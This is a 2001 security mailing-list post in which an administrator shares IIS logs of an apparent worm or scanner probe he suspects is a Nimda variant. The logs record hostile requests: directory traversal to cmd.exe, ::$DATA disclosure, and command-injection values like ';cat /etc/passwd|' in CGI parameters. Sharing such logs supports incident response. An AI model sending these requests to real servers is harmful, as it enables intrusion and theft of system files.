possible new Nimda variant

[Howard Gleason <howard.gleason () computer org>]

Mailer: SecurityFocus

Anyone else seen this, it hit my IIS logs last night.  It has some similarities to Nimda but 
not identical.
--------------------------------------------------
#Fields: date time c-ip cs-username s-sitename cs-method cs-uri-stem cs-uri-query 
sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent)
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 138 19 47 80 
HTTP\1.0 -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 2 143 26 15 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 16 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET 
/scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir 500 87 0 98 0 
80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /bin/ - 404 2 143 24 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /samples/ - 404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_cnf/ - 404 2 143 29 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - 404 2 143 29 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 
404 3 604 98 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 
404 3 604 89 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 
404 3 604 125 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida - 404 2 143 33 15 
80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.idq - 404 2 143 33 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - 404 2 143 27 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfide/ - 404 2 143 26 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_inf.html - 404 2 143 35 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /tsweb - 404 2 143 27 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/_vti_aut/ - 404 3 143 39 
0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp::$DATA - 404 2 604 
39 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp. - 404 2 604 35 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /carbo.ddl - 404 2 143 31 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /technote/ - 404 2 143 29 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-dos/ - 404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/perl.exe - 404 2 143 36 0 
80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /mall_log_files/ - 404 2 143 35 0 
80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Admin_files/ - 404 2 143 32 0 
80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /quote.html - 404 2 604 31 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ikonboard/ - 404 3 143 
38 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /foldoc/ - 404 2 143 27 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/adcycle/ - 404 3 143 36 
0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /ROADS/ - 404 2 143 26 16 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /way-board/ - 404 2 143 30 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/a1stats/ - 404 3 143 36 
0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /index.php 
chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc 404 2 604 71 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi 
dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 404 2 604 98 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php 
dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 86 0 80 HTTP/1.0+ -

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com